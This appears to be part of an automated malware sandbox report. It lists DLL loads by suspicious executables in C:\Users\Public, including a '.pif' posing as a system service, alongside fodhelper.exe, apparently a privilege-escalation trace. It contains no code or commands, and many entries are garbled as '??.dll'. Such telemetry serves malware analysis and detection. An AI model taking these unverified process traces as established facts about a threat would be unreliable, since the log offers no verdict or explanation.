Source: C:\Users\Public\xkn.exe Section loaded: wldp.dll
Source: C:\Users\Public\xkn.exe Section loaded: msasn1.dll
Source: C:\Users\Public\xkn.exe Section loaded: gpapi.dll
Source: C:\Users\Public\xkn.exe Section loaded: msisip.dll
Source: C:\Users\Public\xkn.exe Section loaded: wshext.dll
Source: C:\Users\Public\xkn.exe Section loaded: appxsip.dll
Source: C:\Users\Public\xkn.exe Section loaded: opcservices.dll
Source: C:\Users\Public\xkn.exe Section loaded: secur32.dll
Source: C:\Users\Public\xkn.exe Section loaded: sspicli.dll
Source: C:\Users\Public\xkn.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\xkn.exe Section loaded: propsys.dll
Source: C:\Users\Public\xkn.exe Section loaded: edputil.dll
Source: C:\Users\Public\xkn.exe Section loaded: urlmon.dll
Source: C:\Users\Public\xkn.exe Section loaded: iertutil.dll
Source: C:\Users\Public\xkn.exe Section loaded: srvcli.dll
Source: C:\Users\Public\xkn.exe Section loaded: netutils.dll
Source: C:\Users\Public\xkn.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\xkn.exe Section loaded: wintypes.dll
Source: C:\Users\Public\xkn.exe Section loaded: appresolver.dll
Source: C:\Users\Public\xkn.exe Section loaded: bcp47langs.dll
Source: C:\Users\Public\xkn.exe Section loaded: slc.dll
Source: C:\Users\Public\xkn.exe Section loaded: sppc.dll
Source: C:\Users\Public\xkn.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\xkn.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: wldp.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: propsys.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: netutils.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: version.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: userenv.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinui.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: systemsettingsthresholdadminflowui.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: newdev.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: dismapi.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: timesync.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: dismapi.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: wincorlib.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: devrtl.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: settingshandlers_nt.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: errordetailscore.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\Public\kn.exe Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe Section loaded: version.dll
Source: C:\Users\Public\kn.exe Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe Section loaded: certca.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe Section loaded: profapi.dll
Source: C:\Users\Public\kn.exe Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe Section loaded: version.dll
Source: C:\Users\Public\kn.exe Section loaded: certca.dll
Source: C:\Users\Public\kn.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: version.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: archiveint.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: url.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: mapi32.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???y.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???y.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???y.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ????.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ????.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ????.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???2.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???2.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???2.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ???.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??????s.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: winhttpcom.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: webio.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
